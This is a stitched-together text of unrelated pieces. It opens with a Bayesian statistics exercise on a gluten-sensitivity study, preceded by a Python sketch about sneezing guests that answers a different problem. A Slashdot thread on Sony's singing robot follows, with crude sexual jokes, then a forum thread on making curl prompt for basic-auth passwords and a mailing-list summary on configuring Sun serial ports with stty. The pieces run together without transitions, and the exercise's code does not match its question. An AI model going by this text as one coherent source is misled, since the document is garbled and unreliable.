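One way to sketch this problem (an illustrative approach, not necessarily the notebook's intended solution): the total is the sum of two independent counts, Binomial(4, 0.5) for the allergic guests and Binomial(6, 0.1) for the other six, so its PMF is the convolution of the two binomial PMFs:

```python
import numpy as np
from math import comb

def binom_pmf(n, p):
    """PMF of Binomial(n, p) as an array over k = 0..n."""
    return np.array([comb(n, k) * p**k * (1 - p)**(n - k) for k in range(n + 1)])

allergic = binom_pmf(4, 0.5)      # 4 allergic guests, 50% sneeze probability
non_allergic = binom_pmf(6, 0.1)  # 6 non-allergic guests, 10% sneeze probability

# The total number of sneezers is the sum of two independent counts,
# so its distribution is the convolution of the two PMFs (support 0..10).
total = np.convolve(allergic, non_allergic)

print(total)
print("mean:", np.arange(11) @ total)  # 4*0.5 + 6*0.1 = 2.6
```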
This study from 2015 showed that many subjects diagnosed with non-celiac gluten sensitivity (NCGS) were not able to distinguish gluten flour from non-gluten flour in a blind challenge.
"The gluten-containing flour was correctly identified by 12 participants (34%)..." Since 12 out of 35 participants were able to identify the gluten flour, the authors conclude: "Double-blind gluten challenge induces symptom recurrence in just one-third of patients fulfilling the clinical diagnostic criteria for non-coeliac gluten sensitivity." To use this data, we have to make some modeling decisions.
Using this model, estimate the number of study participants who are sensitive to gluten. What is the most likely number? What is the 95% credible interval?
# Solution goes here
# Solution goes here
# Solution goes here
# Solution goes here
# Solution goes here
https://nbviewer.jupyter.org/github/AllenDowney/ThinkBayes2/blob/master/examples/gluten.ipynb
Sony's New Bi-Pedal Robot 272
TestBoy writes "Sony is releasing a new bipedal robot for home use. It has a 60,000 word vocabulary and can even sing songs." I am especially amused by the photograph of synchronized dancing robots, and the fact that the new bot will cost as much as a luxury car! But it has some impressive stuff like facial recognition.
lalala (Score:2, Funny)
Re:lalala (Score:1)
Re:lalala (Score:2, Funny)
Re:lalala (Score:2)
If that's the case, then adjust the clock speed to your skill level.
Sony (Score:2, Insightful)
It's your responsibility (Score:2, Funny)
It's your responsibility to make sure your robot violates no copyright laws when singing.
It's Sony's responsibility (Score:2)
Sic the DMCA on them, see how *they* like it.
Re:It's your responsibility (Score:2, Funny)
Huh? What the fuck do you think the courts and Congress are full of today, if not singing robots?
(Oh, wait, the singing robots have to be sentient first. Guess that rules out Congress and the courts.)
Every problem has an engineering solution! (Score:2)
Not to worry - the ever-thinking engineers at Sony have taken that problem into consideration. Your robot will come with a credit card reader and a cell-phone so that it can charge the appropriate royalties to your card on a per-incident basis... In the event that the cell network is down, the robot is equipped with a redundant payment system: there is a coin slot so that you can make your payments on-the-spot.
Can it sing "Daisy?" (Score:2)
Hero Jr. (Score:2)
Re:Can it sing "Daisy?" (Score:2)
HAL: If you'd like to hear it, I can sing it for you.
Dave Bowman: Yes...I'd like to hear it HAL....Sing it for me.
HAL: It's called "Daisy" Daisy....Daisy.....Give me your answer due.....I'm half-crazy....all for the love of you....
Re:Can it sing "Daisy?" (Score:3, Funny)
Robots have to sing this...
Share and enjoy.
Or Aqua's 'Barbie Girl' (Score:2)
life in plastic, it's fantastic.
You can brush my hair, undress me anywhere...
Yes, it can sing... (Score:1)
-Henry
60,000 work vocabulary (Score:3, Funny)
Re:60,000 WORD vocabulary (Score:2)
But Can it sing Daisy? (Score:1)
how long before the robots.... (Score:1)
Ok, had to get it out of the way early..while we are at it:
I'm afraid I can't let you do that Dave.
Danger! Danger Will Robinson! Danger!!
Imagine a beowulf Cluster of Natalie Portman pouring hot grits over a few of these?
Any other ones I missed?
I'm going to buy one, and then... (Score:5, Funny)
Re:I'm going to buy one, and then... (Score:2, Funny)
;)
HJO (Score:1)
JTT (Score:1)
As long as it doesn't look like Haley Joel Osment [from "A.I." (2001)] I'll probably buy two.
But what about Jonathan Taylor Thomas [imdb.com]?
Honda, too... (Score:1)
Here's the new Honda w/ Link (Score:5, Informative)
Re:library robots (Score:2)
However, I did also want to tell you that the robots at the museum are not incredibly responsive. They react to a predefined set of movements, and they are neat to look at, but the fact is, if you have to learn how to use it, and it can't do anything of its own volition... it's still a tool/toy. They are not fully mobile bipeds like the article would lead you to believe
Where are the USA robots? (Score:2, Insightful)
We've got plenty of bright people in this country, but we don't make things like this.
We can't afford to fall behind in robot development.
Re:Where are the USA robots? (Score:1)
Re:Where are the USA robots? (Score:2)
Re:Where are the USA robots? (Score:3, Insightful)
That's because rich Americans would rather spend $20,000 on a stereo that does everything, or a handheld that can drive your car, instead of a robot that sings and dances at karaoke parties.
Re:Where are the USA robots? (Score:2)
We have enough space for REAL dogs, and REAL children, so why bother?
Re:Where are the USA robots? (Score:2)
That, my friend, is EXACTLY what is wrong with this country...
US companies can't see the return (Score:2)
Re:Where are the USA robots? (Score:3, Insightful)
We fell behind in television development, and that hasn't hurt us any.
Ah, but television (a.k.a. the opiate of the modern masses), doesn't enhance productivity. With their entertainment robots, I think Sony has done a brilliant thing. They've taken the output of their research division and produced a customer facing product. This is extremely difficult with such a speculative technology - just ask Bell Labs. As toys, these robots can demonstrate the technology without requiring the stability of a commercial release. And by offering a new market (besides industrial assembly lines), they can justify increased development expenses because they'll be able to spread the costs over a larger market.
Re:Where are the USA robots? (Score:2)
Government regulation?
The market is a trial and error marketplace. When a product fails, the market will see the failure - hopefully - and the better product will win. But who compensates those that bought the failure? If you believe in the market system, I think you ought to believe even more in the courts. The courts will make the market system even more effective.
Perhaps you only have a problem with excessive product liability lawsuits? (Frankly, it seems that many more lawsuits are filed by business against business... so the whole "product liability lawsuit as a problem" thing really seems to lose its bloom.)
Cheers!
Singing and Dancing? (Score:5, Funny)
Re:Singing and Dancing? (Score:1)
Move along.
Advanced Realdoll (Score:2, Funny)
Re:Advanced Realdoll (Score:2)
Finaly! (Score:4, Funny)
I've always wanted a pet robot, now I can feel like it's really the future.
Nothing new (Score:1)
Go here [caltech.edu] for a list of more interesting projects...
Get the Expensive Ones Out of the Way Now (Score:2, Insightful)
This is just too cool. All the Asimov I read growing up and to be honest I never thought I would personally own a robot.
Sure I wont be able to afford one of these. But I can remember when my dad couldn't afford a digital watch or calculator.
The expensive, limited units today. The cheap, multifunctional units tomorrow.
This is cool!
.
Robot bed (Score:1)
That is a bit more practical than the Craftmatic teach-yourself-autofellatio model [craftmatic.com] that's been on TV for years.
Who cares what they can do! (Score:1)
In costume (Score:1)
ED-209 (Score:1)
At least it doesn't look anything like Rob... (Score:2)
Re:At least it doesn't look anything like Rob... (Score:2)
Imagine a film version of Liar? Of course, you'd have to make Calvin's issue more than just a crush on a colleague.
I got no strings to hold me down (Score:2)
Sony's not the only company attempting to recreate Pinocchio [imdb.com]. It'll face competition from ZMP Inc's "Pino" robot [google.com].
Question: Who will get the Disney deal [imdb.com] first?
Re:I got no strings to hold me down (Score:2)
>
> Question: Who will get the Disney deal [imdb.com] first?
Investment plan:
Find out who gets the Disney deal. Short their stock. Find out their closest competitor. Buy all the stock I can afford.
The Disney company sells one or two units to every household, and that's that.
The company that didn't get the Disney deal gets to sell (to your g/f or wife) the version of Pinocchio that accurately interprets the programming command: "Everything you say to your owner is a lie."
Waaaaaay more money in that market, particularly given that the nose of that robot burns out after about an hour or two and you gotta buy her a new one, but by then, she doesn't care
;-)
No Kids (Score:1)
Sadly, I'd be more impressed if it had stuff like facial hair.
Battle Bot... (Score:4, Funny)
60k words? (Score:1)
60k words? That's more than all the slashdot editor's vocabularies put together!
Actually, not too many people have a spoken vocabulary that large.
You don't need more than 200 words (Score:2)
60k words?
... not too many people have a spoken vocabulary that large.
Humans don't really need thousands of words to communicate. Some spoken languages have about 1000 words; others have fewer than 150 [tokipona.org]. Indian Sign Language has about 200 words in common use [inquiry.net].
Re:60k words? (Score:5, Funny)
When these things can read Kanji, then I'll be impressed.
Re:60k words? (Score:2)
Moral of the story: If you want a polite society that values automation and small consumer electronics, put some people on an island with no natural resources, but good trading links, and let simmer for 2500 years.
Prediction: Our first space colonies will have red circles on the sides of their spaceships, not stars.
Re:60k words? (Score:2)
For KIN/chika (near/nearby), the mnemonic device is "With this huge caterpillar near, you'll need an axe to protect yourself!"
$1 per word (Score:1)
Oh yeah, Sony is always overpriced
Imagine the implications of this.. (Score:2, Funny)
Technical info (Score:5, Informative)
More technical info (Score:2)
Press-release [sony.co.jp]
Roujin Z (Score:2, Interesting)
Sounds like Roujin Z [animefu.com] to me. Roujin Z is a very funny anime by Katsuhiro Ôtomo, the director of the famous Akira. In the anime the story follows an old man in a new hightech bed, that is made to care for him. You can read a much longer review here. [haverford.edu]
Cool (Score:5, Funny)
Get it for free... (Score:1)
George Lucas, Fear Me!
Heh, just imagine at next years' Cebit... (Score:5, Funny)
Sony employee: ah Mr Microsoft exhibitor, allow me to introduce our latest model bipedal *hunter-killer* robot, fresh from our development labs...
Robot: is there a problem here ?
MS employee: erm, on second thoughts, just carry on as you were...
Teddy in AI (Score:2)
Re:Teddy in AI (Score:2)
BTW, I didnt say fembot. But if it could cook and clean, ill buy one.
Re:Teddy in AI (Score:2)
Too late.
$ grep robot
.newsrc
[...]
alt.sex.fetish.robots
[...]
This is so cool! (Score:2)
Plus, it's just be cool to have one in the server room to reboot boxes for us, and make coffee
The future (Score:2)
Music industry beware (Score:2, Funny)
Vocabulary (Score:5, Funny)
And the optional computer to translate for you is another $60k.
prototype video (Score:2)
they used what?? (Score:4, Funny)
er, scuse me mr doi, but how do you program it not to fall apart when it falls over?
if(robot->sensor.overload && robot->falling)
{
robot->say("danger, danger, get the hell out my way!");
robot->donotfallapart = true;
}
hmm
Re:they used what?? (Score:2)
How the hell does one program a machine to not fall apart when it trips down the stairs or gets kicked by the kids?
I chalk it up to the morons at Fox..."we're infotainment not news damnit"...News.
What's it good for? (Score:5, Funny)
Sony meets RealDoll?
Re:What's it good for? (Score:2)
Just three? Come now, let's aspire to something better than average.
:)
60K words (Score:2)
OTOH, it does have a photographic memory and some command of communication. If Sony would add a cash recognition device, beef up the SDR-4X's carrying capacity, and pep up its mobility in some way, this thing would be great for doing beer runs!
Serious competition for DDR (Score:2, Interesting)
-prator
Re:Serious competition for DDR (Score:2)
What? You mean like these [megatokyo.com] PS2 peripherals?
Ph34r P1n6-ch4n!
Re:Serious competition for DDR (Score:2)
Here's a better Ping strip [llarian.net].
60,000 Word Vocabulary?????? Spare me. (Score:2)
I know a computer can store thousands of words in its RAM or ROM, but calling that a vocabulary is overstretching the point. "Vocabulary" implies comprehension.
I'll wager this robot can't tell its nouns from most of its verbs.
Re:60,000 Word Vocabulary?????? Spare me. (Score:2)
This is the "average" vocabulary. If I were dropping $50k on a toy to interact with, I would not want to talk to someone/something with an average vocabulary. The average college grad has approx a 60-80k word vocabulary and the average doctoral grad has approx 80k-120k word vocabulary.
The problem with defining vocabulary, however, is defining what counts as a real word. Is a vocabulary word one that someone uses properly, or perhaps one that will be understood in some contextual paradigm but not be easy to define?
Additionally, I would be interested to see what is counted as active versus passive use of words in the vocabulary.
Entertainment vs Utility (Score:2)
I wonder if this is what being a god is like. Does she laugh at the pointlessness of it all too? Will Sony make an SDR-5X that makes little robots out of Mindstorms?
Fear the next killer app. (Score:2)
You have been warned.
Funny but nobody's mentioned... (Score:2)
I mean, yeah, it's cool and all, but remember where it comes from.
An army of robots? (Score:2)
Robot Ukemi (Score:2)
Link to video (Score:4, Informative)
Re:Link to video (Score:2)
Something sounded like "auf inderschleiden umf POSITRONIC BRAIN bis hin zum fertigen..."
Whhaaaaattt???? These things are cooler than I thought!
-Russ
PS2 as robot hub? (Score:2, Interesting)
The Aibo is really dumb (Score:2)
This new humanoid unit seems to be an upgrade of the Aibo technology. I'm curious to see how good the balance control is.
When it puts the cat out All night long (Score:2)
Marvin (Score:2, Funny)
Decisions, decisions... (Score:2)
Re:What we need now. (Score:2)
Rock'em Sock'em Robots [yesterdayland.com], baby!
Re:only 23" tall? (Score:2)
You mean you don't want it to say "Home again home again jiggedy-jig. Good evening J.F." and bump into the wall tragi-comedically?
Re:real dolls vs. aibo antics (Score:2)
Other enhancements currently available:
1. Interactive sensory response system: This system is composed of sensors embedded in the Realdoll's breasts, vaginal and anal entries. The doll is connected via an ethernet cable (up to 100') to your PC, and when the various sensors are triggered by activity, the doll will respond with sensor specific audio. The software will run on any Windows based PC, and is completely user editable; the directories for each sensor can be edited to the user's taste by adding or subtracting specific audio files. This system is currently offered in limited quantity. Please check with us for availability if you are interested in adding this option to your order. The price for this option is currently $1500.00
Fascinating, the things they can do with technology...
DennyK
Re:Where's Harrison Ford when you need him? (Score:2)
Re:Where's Harrison Ford when you need him? (Score:2)
Curl to prompt a User Name and Password
I have a password-protected web folder on my site, and I am fetching that folder on another domain using
curl. What I want is: when I try to open the URL it should ask me for the user name and password; instead of asking, it displays "Authorization Required".
Example:
- (password protected using htpasswd/.htaccess)
-
If I try to access the "a" URL it asks me for the user name and password. Fine. But it doesn't ask me for the user name and password on "b" (which uses curl).
Any Idea?
In short: I want to make curl ask for the user name/password prompt.
Regards
I am not sure if it is possible or not, but if it's possible please let me know how; otherwise I will close this as "Invalid"
Try the following:
curl -su 'user' <url>
It should prompt for the password of that user.
Use the -u flag to include a username, and curl will prompt for a password: curl -u username. You can also put the credentials in a password file; the format (as per man curl) is: machine <example.com> login <username> password <password>. Note: the machine name must not include https:// or similar, just the hostname. The words 'machine', 'login', and 'password' are keywords; the actual information is the text after those keywords.
For .htaccess-style password protection, you can code the userid and password as in:
curl -u userid:password http://.......
To use curl to access a site that requires HTTP authentication, pass the credentials with -u/--user, which accepts a colon-separated user name and password: curl -u username:password <url>. Passwords are tricky and sensitive; leaking one can let someone other than you access the protected resources and data, so curl offers several ways to receive a password from the user.
You can also supply the header yourself: -H 'Authorization: Basic <token>', where <token> is user:pass encoded in base64.
The same -u <username>:<password> option works with any protocol curl supports; give just the user name without the password and curl will instead prompt the user for it.
Examples:
--user
curl -v --user myName:mySecret
-u
curl -v -u myName:mySecret
(an example of Minh Nguyen's suggestion:)
curl -v -su 'myName'
asks for the pw of user 'myName'.
If the site uses HTTP authentication, then curl will prompt for a password if you provide a user name with -u. (The same question, "Prompt for username and password", was raised on the curl-users list by Jacky Lam <sylam_at_emsoftltd.com>, Tue, 12 Mar 2002.)
you can use cookies there I think. The steps would be:
- If you try to curl "" with no cookies, it can return you an HTML login form.
- Your form's action would point to 2nd server and if the credentials were right, set the cookie there and return (redirect) to server 1.
- And if you curl again, you'd check the cookie on the other side and in this case, it could read that cookie and return you the admin page output instead.
Re: Prompting for password: use the -u flag to include the user name, and curl prompts for the password: curl -u username. You can also include the password inline: curl -u username:password.
Don't show passwords or user credentials on screen-shares; pass the keyboard (or a screen/tmux share) and have the owner type them in. Also note that if you run Windows and use curl's password file, you must name the file _netrc. From man curl: -u, --user <user:password>; if you just give the user name (without entering a colon) curl will prompt for a password.
Rather than passing the password as a command-line argument, having curl prompt for it directly is better. To do that, use the -u user:pass argument: if you skip the password but leave the colon, an empty password is set; if you also skip the colon, curl prompts for the password. Better still, use curl -n with a .netrc file so the password never appears on the command line at all.
- Why not just prompt for a login before using Curl?
- hmm that would be cool, my second domain is hosted on a Plesk server, which doesn't allow me to have htaccess over there.. and secondly, may be I don't want to have any password file on my second domain or any scripting...
- I tried this, and it just tells me that it can't resolve host "username".
- I think this should be the accepted answer, worked for me.
- hmm, that's a correct approach, but I want a password prompt; I never want to have the user name or password in a file hosted on my second domain
- Not sure about your environment, if I do it in a shell script. It is something like. read -p "Userid: " userid ; read -s -p "Password: " passwd; curl -u $userid:$passwd http://......
- We need an HTTP prompt here, instead of a hard-coded user name and password
- Let me see if I understand this correctly, on the "b" site you want to access the "a" site on the server side? and you want the "b" to generate a password prompt on the client's browser? You need a CGI on the "b" site to do that.
- If you use any of these methods (including read -s method and any tricks around this), your password can be found in the system, process table: /proc or using strace -p <pid>
- That solution doesn't prompt for a password. You have the password on the curl command line.
- Nope, it doesn't return the login prompt, and that's what I needed!
- Ok, but you need to write it yourself, using PHP or whatever you've got there.
- This answer should NOT be accepted, where is the Answer? How do you place PHP_AUTH_USER? A sample with Code would be great for other users! This is just confusing even more!
Hello;
Thank you all very much for your prompt and generous help with my problems
including my misunderstanding of UNIX shells. My background in other operating
systems continues to mislead me in such things as the handling of the standard
input and output files, the domains for which such definitions are active, and
the way in which the UNIX process structure affects these definitions for various
forms of command invocation - sub shells, etc. Thanks again for your
patience and advice.
I have summarized the responses into 'programmatic' and 'command line' categories
below. A row of plus signs (++++++) separates the individual suggestions.
In our case I put a data analyzer on the serial line so I could be certain of
both the basic communications parameters and how the data were being handled: the carriage return/line feed issues and the like.
One thing that impressed me greatly was the variation between operating system
versions, and other factors about which I am not clear. On the Sun IPX with
version 4.1.3 of the OS, and using the c-shell, the only version of stty that
would set the non-login port correctly is the System V version: (/usr/5bin/stty
parenb -parodd cs7 cstopb nl;sleep 100000) < /dev/ttya &. The standard BSD
version of stty would only set the login port. On the inquiry side, stty would
report on /dev/ttya if the I/O redirection operator pointed TO the port e.g.
stty -a > /dev/ttya, but would report the login port if redirection was stated in
the way that made intuitive sense to me: stty -a < /dev/ttya; cat > /dev/ttya
sends data to the port, and cat < /dev/ttya accepts data from it.
None of these options would work on some Sun 386i's available to me (V4.0.2).
So, although we have our tablet working fine, I suspect that the generality of the solution I've cobbled together is limited.
allan
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
I. Programmatic
I think this is what you want
Output modes
The c_oflag field specifies the system treatment of output:
ONLCR 0000004 Map NL to CR-NL on output.
^^^^^^^^^^
OCRNL 0000010 Map CR to NL on output.
ONLRET 0000040 NL performs CR function.
From the man page on TERMIO: with ONLCR you might get an extra NL, but it
may work; or you could try not setting OCRNL and see if CR goes
straight through. You will need to use the stty C interface (man 3
stty).
Boyd Fletcher
boyd@cs.odu.edu
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
I'm not sure if this will help; I wrote such a program a long time ago
to use a Texas Instruments HI-9018 digitizing tablet on a Sun. Note the
program uses CGI graphics. This has been abandoned by Sun but you might find
it in an "old" directory or should be able to either comment it out or
replace it. Anyway it might give you some ideas/ a starting point.
Certainly it worked for us a couple of years ago when we needed to do some
digitizing.
/* HI 9018 digitizer
* To compile: cc -O -o hi9018 hi9018.c -lcgi -lsunwindow -lpixrect -lm
* NOTE: Assumes ASCII_2 mode to circumvent hardware bug
* (else you will probably get a sscanf error)
* Uses cgi plotting to current Sun window
* invocation: hi9018 [-b baud] [-d] [-n] [-z zval] [-p]
* -b baud : set baud rate to baud; default is 4800
* -d : set debug mode, print out extra info
* -n : don't strip out tag bit. Default is to strip.
* -z zval : add a constant z coordinate zval to x y [tag] output
* -p : create crude cgi plot to Sun window; tag = 1 is 'pen down',
* tag = 2,3,4 is 'pen up'. The first two points digitized MUST
* be the upper right and lower left corners to initialize the
* plot scaling. */
#include <stdio.h>
#include <sgtty.h>
#include <signal.h>
#include <sys/file.h>
#include <sys/ioctl.h>
#include <sys/ttydev.h>
#define PORT "/dev/ttyb"
#define DEFBAUD 4800
#define TRUE 1
#define FALSE 0
static char *usage = "usage: hi9018 [-b baud] [-d] [-n] [-z zval] [-p]";
static char *badstr = "possible bad input:";
/* Global for catcher() to see */
static int plot = FALSE;
main(argc,argv)
int argc; char *argv[];
{
register int f,nb; int urx,ury,llx,lly,debug=FALSE;
int baud= DEFBAUD,strip = TRUE,catcher(),x,y,tag,first=TRUE;
char buf[80], *s, *z = NULL, tagl; struct sgttyb stty;
for (f = 1; f < argc; f++)
switch (*(argv[f]+1)) {
case 'n': strip = FALSE; break;
case 'b': baud = atoi(argv[++f]); break;
case 'd': debug = TRUE; break;
case 'z': z = argv[++f]; break;
case 'p': plot = TRUE; break;
default : exit(fprintf(stderr,"%s\n",usage)); }
if ((f = open(PORT,O_RDWR,0)) <= 0) exit(perror("open"));
if (ioctl(f,TIOCGETP,&stty) < 0) exit(perror("TIOCGETP"));
switch (baud) {
case 1200: stty.sg_ispeed = stty.sg_ospeed = B1200; break;
case 2400: stty.sg_ispeed = stty.sg_ospeed = B2400; break;
case 4800: stty.sg_ispeed = stty.sg_ospeed = B4800; break;
case 9600: stty.sg_ispeed = stty.sg_ospeed = B9600; break;
case 19200: stty.sg_ispeed = stty.sg_ospeed = B19200; break;
default: exit(fprintf(stderr,"%d not valid speed\n",baud)); }
stty.sg_flags &= ~(ECHO|CRMOD); stty.sg_flags |= TANDEM;
if (ioctl(f,TIOCSETP,&stty) < 0) exit(perror("TIOCSETP"));
signal(SIGTERM,catcher); /* set up clean exit for kill modes */
signal(SIGINT,catcher); signal(SIGQUIT,catcher);
/* if real-time plot then
* 1) get upper right (X,Y)
* 2) get lower left (X,Y)
* 3) initialize cgi plot mode. */
if (plot) {
if ((nb = read(f,buf,sizeof(buf)-1)) > 0 )
{ if (sscanf(buf,"%c%d%d\n",&tagl,&urx,&ury) != 3)
exit(perror("sscanf")); }
else exit(perror("ur read"));
if ((nb = read(f,buf,sizeof(buf)-1)) > 0 )
{ if (sscanf(buf,"%c%d%d\n",&tagl,&llx,&lly) != 3)
exit(perror("sscanf")); }
else exit(perror("ll read"));
if (debug)
{ printf("%s\n",buf);
printf(" %d %d %d %d\n",urx,ury,llx,lly); }
}
while (TRUE) /* Suck up input from digitizer (until signal occurs) */
{
if ((nb = read(f,buf,sizeof(buf)-1)) > 0 )
{
if (sscanf(buf,"%c%d%d\n",&tagl,&x,&y) != 3)
exit(perror("sscanf"));
tag= ((int) tagl) >> 4; /* See Appendix D-2 */
if ((tag % 2) == 0) tag -=3; else tag-- ;
if (debug)
{ printf("%s\n",buf);
printf(" %c %d %d %d\n",tagl,tag,x,y); }
if (plot) {
if (first == 0) plotpt(x,y,tag);
else { wininit(urx,ury,llx,lly,x,y); first= FALSE; } }
if (z == NULL) {
if (strip) printf("%6d %6d \n",x,y);
else printf("%6d %6d %d \n",x,y,tag); }
else {
if (strip) printf("%6d %6d %s \n",x,y,z);
else printf("%6d %6d %d %s \n",x,y,tag,z); }
fflush(stdout);
}
else if (nb < 0) perror("read");
}
}
/* Catch termination signal and exit gracefully */
catcher(sig,code,scp) /*ARGSUSED*/
int sig,code; struct sigcontext *scp;
{ if (plot) endwin();
printf("\nhi9018 terminating on signal %d\n",sig);
exit(0); }
#include <cgidefs.h>
Ccoorlist plotlist;
Ccoor plot_coords[2], vpll, vpur, lower, upper;
Cint name;
wininit(urx,ury,llx,lly,x1,y1)
int urx,ury,llx,lly,x1,y1;
{
int xdif, ydif;
Cvwsurf device;
NORMAL_VWSURF(device,PIXWINDD);
open_cgi();
open_vws(&name, &device);
upper.x= urx; upper.y= ury;
lower.x= llx; lower.y= lly;
xdif= (urx - llx)/ 20; /* 5% boundary */
ydif= (ury - lly)/ 20; /* (Outliers will be clipped) */
vpll.x = llx - xdif; vpll.y= lly - ydif;
vpur.x = urx + xdif; vpur.y= ury + ydif;
vdc_extent(&vpll, &vpur);
rectangle(&lower, &upper);
plot_coords[0].x= x1; plot_coords[0].y= y1;
plotlist.n = 2;
}
plotpt(x,y,tag)
int x,y,tag;
{
if (tag == 1) /* pen down, move to x,y */
{
plot_coords[1].x= x; plot_coords[1].y= y;
plotlist.ptlist = plot_coords;
polyline(&plotlist);
plot_coords[0].x= plot_coords[1].x;
plot_coords[0].y= plot_coords[1].y;
}
else /* pen up, move to x,y */
{ plot_coords[0].x= x; plot_coords[0].y= y; }
}
endwin()
{ close_vws(name); close_cgi(); }
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Your original is attached below:
BUT...
After you open the device for write, do an ioctl (using a termios struct)
set c_oflag = (c_oflag | ONLRET) & (~OCRNL)
Michael Baumann
Radiation Research Lab |Internet: baumann@proton.llumc.edu
Loma Linda University Medical Center | UUCP: ...ucrmath!proton!baumann
Loma Linda, California. (714)824-4077|
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
II. Command Line:
As you have probably also noted, Sun delivers 2 versions of stty which
differ in functionality in some ways. /bin/stty is incapable of being
redirected on input, while /usr/5bin/stty can be redirected. That is,
/bin/stty < /dev/ttya fails to read the status of /dev/ttya
but instead gives the same as "stty"
/usr/5bin/stty < /dev/ttya does give the status of ttya
Unfortunately, I was not successful in using the 5bin version to affect
on an output-redirected device, even if I had a process holding the device
open. (ie, the moral equivalent of cat > /dev/ttya running in another
window). I am not clear why /usr/5bin/stty onlcr > /dev/ttya does not
seem to work. CAVEAT: I don't have any serial devices at my disposal,
so I was testing on ports without anything "live" plugged in. This might
invalidate my efforts.
I hope that some other sun-managers with more recent serial interfacing
experience can point you at a package to solve your problem, otherwise
I'm afraid that command-line parsing and ioctl calls within your application
package is the approach I'd be forced to take.
Best of luck, and I'll be looking forward to learn from the net's collective
wisdom.
-tom
Tom Slezak
Human Genome Center, L-452
Lawrence Livermore National Lab
7000 East Ave. Livermore, CA 94550
phone: (510) 422-5746 fax: (510) 423-3608
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
from stty(1) manual page:
DESCRIPTION
stty sets certain terminal I/O options for the device that
is the current standard output. Without arguments, it
reports the settings of certain terminal options for the
device that is the standard output; the settings are
reported on the standard error.
Detailed information about the modes listed in the first
five groups below may be found in termio(4). Options in the
last group are implemented using options in the previous
groups. Note: many combinations of options make no sense,
but no sanity checking is performed.
SYSTEM V DESCRIPTION
stty sets or reports terminal options for the device that is
the current standard input; the settings are reported on the
standard output.
To have stty report on, or control an arbitrary serial port, just use
the usual shell redirection operator so that stty's standard input or
output (depending on which flavor of stty you use) is the port.
I prefer System V, so I would use:
/usr/5bin/stty -onlcr </dev/ttya
Remember that a serial port reverts to its default settings whenever
no process has it open, so you probably need to construct a shell
script that does something like this:
(
/usr/5bin/stty -onlcr
command-that-configures-tablet
) </dev/ttya
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
You have one. From the man page for stty:
> stty sets certain terminal I/O options for the device that
> is the current standard output.
Thus, for example, `stty -ocrnl >/dev/ttya' will set parameters for port `a'.
Rich Schultz
rich@ccrwest.org
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
"stty" doesn't act on "the current session device", except for a few
operations such as "stty size", "stty speed", and "stty -g".
"/usr/bin/stty" acts on its *standard output*, and "/usr/5bin/stty" acts
on its *standard input*.
Both the standard input and output, *by default*, will be the current
session device; however, you can redirect them with the standard UNIX
shell redirection operations, e.g.
stty -onlcr >/dev/ttya # "stty" here is assumed to be "/usr/bin/stty"
or
/usr/5bin/stty -onlcr </dev/ttya
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Try:
stty options > /dev/ttyx
where ttyx is your port
Thomas
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
You can use stty to configure any serial tty by making it the standard OUTPUT on the command line :
stty ..... > /dev/tty*
similarly to read the current settings use the same redirection :
stty -a > /dev/tty*
I have writen various scripts to control arbitrary serial ports this way.
Make sure you have write access to the required device of course.
----------------------------------------------------------------------
Peter Farmer e-mail: doss@cs.anu.edu.au
Programmer phone: +61 6 249 3434
Department of Computer Science, fax: +61 6 249 0010
2nd floor, Crawford Building,
Australian National University
Canberra, AUSTRALIA
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
stty applies any changes to stdout, while printing to stderr (if you
are not running sys V emulation), so if you wish to change something
on, say /dev/ttyb try the following:
; stty (args) > /dev/ttyb
alan.
-- Alan Hargreaves (VK2KVF) alan@frey.newcastle.edu.au, Uni of Newcastle, UCS. Ph: +61 49 215 512 Fax: +61 49 684 742 ICBM: 32 53 44.6 S / 151 41 52.6 E
Software Bloat - Any UNIX(tm) after Version 7. (Sm@cerberus.bhpese.oz.au)
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
You can make stty mess with an arbitrary port via of the following (I forget which):
stty -options > /dev/ttynn # BSD, probably Sun
stty -options < /dev/ttynn # SysV, probably not Sun
If a program doesn't hold the port open, it will revert to some other state after you set it. So, open the port with a program before you do the stty:
(sleep 2147483646 > /dev/ttynn) &
Also make sure that no other program is trying to mess with the port, i.e. a getty started from init.
"To use Fred Brooks' terminology, people keep handing me programs when I'm expecting programming products." -- Me ------------------------------------------------------------------------------- Brian Bartholomew - bb@math.ufl.edu - Univ. of Florida Dept. of Mathematics
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
The standard way that you do this is to create a session which sets the parameters you want then hangs around for a long time, eg run something like this in /etc/rc.local:
(stty -onlcr; sleep 10000000) > /dev/ttya &
Just add the specific stty commands that you need. 10 million seconds is about 5 months so the command should never exit.
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
I don't have a 4.1.3 system handy, but at least on 4.1.2 stty operates on the device which is its standard output. (The Sys5 version operates on its standard input.) It "should" therefore be possible to apply either version of stty to an arbitrary port (provided, of course that there isn't a getty enabled on it to fight with you for control).
If the problem is that the driver is resetting to defaults on the last close of the device, you could do something like
sleep 60 > /dev/{whatever} &
so that the sleep process will hold the port open while other things happen, thereby keeping any other process' close operation from being the last one.
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Try "stty < /dev/ttya" ...
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
cheesy way:
% ( stty -NLCR > /dev/ttyb ; command opt1 opt2 opt3)
stty changes the line discipline for whatever device is the current stdout.
two cleaner ways of doing this: (a) write a streams module you can push on top of the tty stack to do the conversion (b) close your controlling terminal, then open the tty port, then use the ioctl()s from within the interface program to set the line discipline.
(b) gets my vote, but not knowing what the code looks like, the cheesy solution might have to be it.
--hal
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
> ... and *for the current session device*, stty can handle the job on the
> command line.
